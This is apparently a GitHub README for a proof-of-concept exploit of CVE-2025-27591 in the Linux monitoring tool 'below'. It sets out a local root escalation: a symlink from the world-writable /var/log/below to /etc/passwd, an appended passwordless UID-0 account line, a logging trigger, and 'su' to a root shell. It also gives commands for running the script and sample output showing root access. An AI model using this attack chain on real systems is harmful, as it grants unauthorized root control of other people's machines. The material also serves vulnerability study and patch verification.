
CVE-2025-27591 PoC — below security vulnerability

Associated Vulnerability
Title: below security vulnerability (CVE-2025-27591)
Description: A privilege escalation vulnerability existed in the Below service prior to v0.9.0 due to the creation of a world-writable directory at /var/log/below. This could have allowed local unprivileged users to escalate to root privileges through symlink attacks that manipulate files such as /etc/shadow.
Description
🔥 Local Privilege Escalation Exploit for CVE-2025-27591 | Abuses world-writable log dir in Below to gain root via /etc/passwd injection
Readme
# CVE-2025-27591 – Privilege Escalation via Symlink Abuse in `below`

[![Author](https://img.shields.io/badge/author-00xCanelo-blue)](https://github.com/00xCanelo)
[![CVE](https://img.shields.io/badge/CVE-2025--27591-critical-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27591)

> 🛑 **Disclaimer**: This exploit is provided **for educational and authorized security testing only**. Unauthorized use may be illegal.

---

## 🧠 Overview

`below` is a performance monitoring tool developed by Facebook for Linux systems. Versions of `below` prior to v0.9.0 are affected by a critical vulnerability that allows **unprivileged users** to escalate to **root** by exploiting a **world-writable log directory** (`/var/log/below`) and unsanitized log handling.

---

### 🔎 CVE Details

| Field            | Value                                          |
|------------------|------------------------------------------------|
| **CVE-ID**       | [CVE-2025-27591](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27591) |
| **Severity**     | 🔥 Critical (CVSS ≈ 7.8 - 8.8)                 |
| **Attack Vector**| Local                                          |
| **Impact**       | Privilege Escalation to root (UID=0)           |
| **Exploit Type** | Symlink Abuse / Log File Injection             |
| **Affected App** | `below` – typically installed as `/usr/bin/below` |
| **Root Cause**   | Unsafe file writes to `/var/log/below/` without permission checks |

---

## 💥 Exploit Logic

This Bash script performs the following:

1. **Check for World-Writable Directory**:
   - Confirms if `/var/log/below` is world-writable (a red flag).

2. **Prepare Symlink Attack**:
   - Deletes existing `error_root.log` (if any) and creates a symbolic link to `/etc/passwd`.

3. **Payload Construction**:
   - Appends a fake root user to `/etc/passwd`:  
     ```
     fakeadmin::0:0:fakeadmin:/root:/bin/bash
     ```

4. **Trigger Logging**:
   - Runs `sudo below record` to force the vulnerable binary to write logs.

5. **Gain Root Access**:
   - Uses `su fakeadmin` to obtain a root shell with no password prompt.

---

## 📁 Directory Structure

```text
CVE-2025-27591/
├── exploit.sh
├── README.md
```

## ✅ Prerequisites

Before running the exploit, ensure you have the following:

- Bash shell (Linux system)
- The vulnerable binary installed: `/usr/bin/below`
- World-writable log directory: `/var/log/below`
- `sudo` privileges to execute: `sudo below record`
- Tools available:
  - `ln` (to create symlinks)
  - `su` (to switch users)
  - `timeout` (to control execution time)
  - `whoami` (for privilege check)

---

## 🚀 Exploitation Steps

```bash
# 1. Clone the repository
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591

# 2. Make the script executable
chmod +x exploit.sh

# 3. Execute the exploit
./exploit.sh
```

## 🧪 Sample Output

```text
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd

[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)

[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.

[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
```